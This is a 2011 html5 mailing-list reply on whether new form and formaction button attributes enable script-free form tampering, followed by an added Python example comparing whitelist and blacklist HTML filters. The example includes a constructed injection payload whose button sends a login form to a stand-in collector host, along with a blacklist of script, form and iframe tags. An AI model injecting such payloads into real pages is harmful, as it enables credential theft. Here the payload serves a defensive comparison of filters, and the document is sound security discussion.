Re: [html5] Input attributes allow form tampering

On Tue, 2 Aug 2011, Philippe De Ryck wrote:
>
> The new form attributes, which can be used with submit buttons, can make 
> it difficult for a user to distinguish the form that is being submitted. 
> This can be used by an adversary to trick the user into submitting a 
> form, such as an autocompleted login form. Even though this attack was 
> already possible with JavaScript enabled, this new vector does not 
> depend on scripts. Additionally, it is possible that current content 
> validation filters do not yet protect against button injection.

Surely this was already possible by just injecting </form><form action...> 
in the same place as the button would be inserted today?


> Alternatively, if changing the specification is not possible, developers 
> should be warned about this attack vector, so they can update their 
> content filters.

Filters must be written using whitelists. A filter written using a 
blacklist is essentially worthless. A whitelist filter would not be 
affected by this or many other additions to HTML.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'

Received on Tuesday, 2 August 2011 21:51:21 UTC
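
The contrast drawn in the reply above between whitelist and blacklist filters, as an added example that is not part of the original message. The tag policy, the function names and the sample comment (including the host collector.example) are constructed for illustration; the blacklist stands in for a filter written before the HTML5 form attributes existed.

```python
import re
from html import escape
from html.parser import HTMLParser

# Assumed policy for this example: what a comment field is allowed to keep.
ALLOWED = {"p": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
           "br": set(), "a": {"href"}}
SAFE_HREF = re.compile(r"^https?://", re.I)

class _Whitelist(HTMLParser):
    """Re-emits only allowed tags and attributes; everything else becomes text."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown element (e.g. <button>): drop the tag, keep its text
        kept = [f' {name}="{escape(value, quote=True)}"'
                for name, value in attrs
                if name in ALLOWED[tag] and value
                and (name != "href" or SAFE_HREF.match(value))]
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def whitelist_filter(html):
    parser = _Whitelist()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)

# Blacklist: knows <script>, <form>, <iframe> and on* handlers, nothing newer.
BLOCKED = re.compile(r"<\s*/?\s*(script|form|iframe)\b[^>]*>"
                     r"|\son\w+\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)", re.I)

def blacklist_filter(html):
    return BLOCKED.sub("", html)

# Constructed sample: a comment carrying a button bound to another form on the page.
SAMPLE = ('<p>Nice post!</p><button form="login" '
          'formaction="https://collector.example/">Next page</button>')
```

The blacklist strips the `</form><form action...>` variant mentioned in the reply but returns SAMPLE unchanged, while the whitelist reduces it to `<p>Nice post!</p>Next page` without knowing anything about the new attributes.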